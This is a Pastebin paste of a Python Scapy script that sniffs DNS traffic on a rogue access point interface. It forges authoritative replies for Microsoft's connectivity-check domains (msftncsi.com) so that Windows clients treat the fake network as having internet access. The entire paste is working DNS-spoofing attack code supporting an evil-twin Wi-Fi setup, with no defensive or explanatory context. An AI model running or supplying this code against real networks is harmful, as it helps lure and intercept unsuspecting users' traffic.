Advertisement
martinpo21

msftncsi fix

Jan 17th, 2016
176
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.22 KB | None | 0 0
  1. from scapy.all import *
  2. DIR=os.path.dirname(os.path.abspath(__file__))
  3. print('Executed from '+DIR+'\n')
  4. print('Assuming interface at0')
  5.  
  6. def FakeAccess2(pkt):
  7. pkt=pkt[0]
  8. if pkt.haslayer(DNSQR):
  9. print('Packet with DNSQR layer found.')
  10. if pkt[DNS].qd.qtype == 1:
  11. print('DNSQR type appears type = A')
  12. if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
  13. #MUST RETURN TRUE VALUE!
  14. print('It appears captured DNS request requests dns.msftncsi.com')
  15. spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
  16. IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
  17. UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
  18. DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
  19. an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='131.107.255.255'))
  20. del pkt[IP].chksum
  21. del pkt[UDP].chksum
  22.  
  23. sendp(spoofed_pkt,iface='at0')
  24. print('Spoofed response send:')
  25. spoofed_pkt.show2()
  26.  
  27. if 'www' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
  28. #MUST POINT TO SERVER WITH ncsi.txt; ISTO NARED ZA IPV6
  29. print('It appears captured DNS request requests www.msftncsi.com')
  30. spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
  31. IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
  32. UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
  33. DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
  34. # 10.0.0.254 mora bit GW nastiman za dhcp
  35. an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='10.0.0.254'))
  36. del pkt[IP].chksum
  37. del pkt[UDP].chksum
  38.  
  39. sendp(spoofed_pkt,iface='at0')
  40. print('Spoofed response send:')
  41. spoofed_pkt.show2()
  42.  
  43. else:
  44. print('Wrong DNS.qd.qname :'+pkt[DNS].qd.qname)
  45.  
  46. if pkt[DNS].qd.qtype == 28:
  47. print('DNSQR type appears type = AAAA')
  48. if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
  49. #MUST RETURN TRUE VALUE
  50. print('AAAA DNS request for dns.msftncsi.com found, loop works')
  51. spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
  52. IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
  53. UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
  54. DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
  55. an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fd3e:4f5a:5b81::1'))
  56.  
  57. del pkt[IP].chksum
  58. del pkt[UDP].chksum
  59.  
  60. sendp(spoofed_pkt,iface='at0')
  61. print('Spoofed response send:')
  62. spoofed_pkt.show2()
  63.  
  64. if 'dns' not in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
  65. #MUST RETURN TRUE VALUE
  66. print('AAAA DNS request for www.msftncsi.com found, loop works')
  67. spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
  68. IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
  69. UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
  70. DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
  71. an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fe80::ea94:f6ff:fe24:d147'))
  72. #RDATA JE IPV6 OD at0
  73. del pkt[IP].chksum
  74. del pkt[UDP].chksum
  75.  
  76. sendp(spoofed_pkt,iface='at0')
  77. print('Spoofed response send:')
  78. spoofed_pkt.show2()
  79.  
  80. else:
  81. print('Captured packet has no DNSQR')
  82.  
  83. print('Sniffing...')
  84. sniff(filter='dst port 53',prn=FakeAccess2, store=0, count=0, iface='at0')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement